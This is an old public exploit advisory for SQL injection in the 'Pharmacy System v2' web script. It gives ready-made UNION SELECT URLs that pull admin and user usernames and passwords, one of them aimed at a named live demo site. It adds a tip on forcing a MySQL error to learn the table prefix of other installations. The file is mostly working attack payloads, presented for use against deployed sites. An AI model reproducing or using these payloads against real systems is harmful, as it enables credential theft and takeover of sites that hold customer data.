40 lines
No EOL
1.8 KiB
Text
40 lines
No EOL
1.8 KiB
Text
--==+================================================================================+==--
|
|
--==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
|
|
|
|
SCRIPT DOWNLOAD: PAY SCRIPT
|
|
|
|
|
|
SITE: http://www.netartmedia.net/pharmacysystem/
|
|
|
|
|
|
DORK: N/A
|
|
|
|
|
|
EXPLOITS:
|
|
|
|
EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
|
|
EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users
|
|
|
|
EXAMPLES:
|
|
|
|
EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
|
|
|
|
NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix
|
|
follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to
|
|
see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection
|
|
if you cant do that then dont use the exploit.
|
|
|
|
GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-06-24] |